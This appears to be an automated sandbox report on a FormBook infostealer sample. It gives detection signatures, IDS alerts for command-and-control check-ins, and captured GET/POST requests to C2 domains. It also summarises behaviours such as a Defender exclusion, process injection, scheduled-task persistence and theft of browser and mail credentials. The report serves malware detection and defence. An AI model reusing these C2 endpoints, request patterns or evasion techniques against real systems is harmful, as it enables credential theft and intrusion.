Windows Analysis Report
ekte.exe

Overview

General Information

Sample name: ekte.exe
Analysis ID: 1538477
MD5: a0f5d21ab28654f9310e591044950160
SHA1: 2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
SHA256: c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: ekte.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Avira: detection malicious, Label: TR/Kryptik.oucnm
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe ReversingLabs: Detection: 63%
Source: ekte.exe ReversingLabs: Detection: 63%
Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Joe Sandbox ML: detected
Source: ekte.exe Joe Sandbox ML: detected
Source: ekte.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ekte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ekte.exe Code function: 4x nop then jmp 00CA275Bh 0_2_00CA1E3F
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 4x nop then jmp 00A5202Bh 10_2_00A5170F

Networking

Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49167 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49173 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49189 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49170 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49170 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49182 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49185 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 208.91.197.27:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49186 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49177 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49181 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 15.197.148.33:80
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe DNS query: www.guldeu.xyz
Source: Joe Sandbox View IP Address: 162.0.238.246
Source: Joe Sandbox View IP Address: 15.197.148.33
Source: Joe Sandbox View IP Address: 45.33.6.223
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: TANDEMUS
Source: Joe Sandbox View ASN Name: ITLDC-NLUA
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3180000[1].zip
Source: global traffic HTTP traffic detected: GET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1Host: www.guldeu.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1Host: www.wdgb23.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1Host: www.childlesscatlady.todayAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: www.deikamalaharris.info
Source: global traffic DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic DNS traffic detected: DNS query: www.rockbull.pro
Source: global traffic DNS traffic detected: DNS query: www.timetime.store
Source: global traffic DNS traffic detected: DNS query: www.guldeu.xyz
Source: global traffic DNS traffic detected: DNS query: www.asiapartnars.online
Source: global traffic DNS traffic detected: DNS query: www.wdgb23.top
Source: global traffic DNS traffic detected: DNS query: www.childlesscatlady.today
Source: global traffic DNS traffic detected: DNS query: www.martaschrimpf.info
Source: unknown HTTP traffic detected: POST /0804/ HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.rockbull.proContent-Length: 2165Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeReferer: http://www.rockbull.pro/0804/User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 21 Oct 2024 11:15:25 GMTContent-type: text/html; charset=utf-8Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:36 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:39 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:41 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:15:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: findstr.exe, 00000013.00000002.627150947.0000000002F56000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000003126000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3Jj
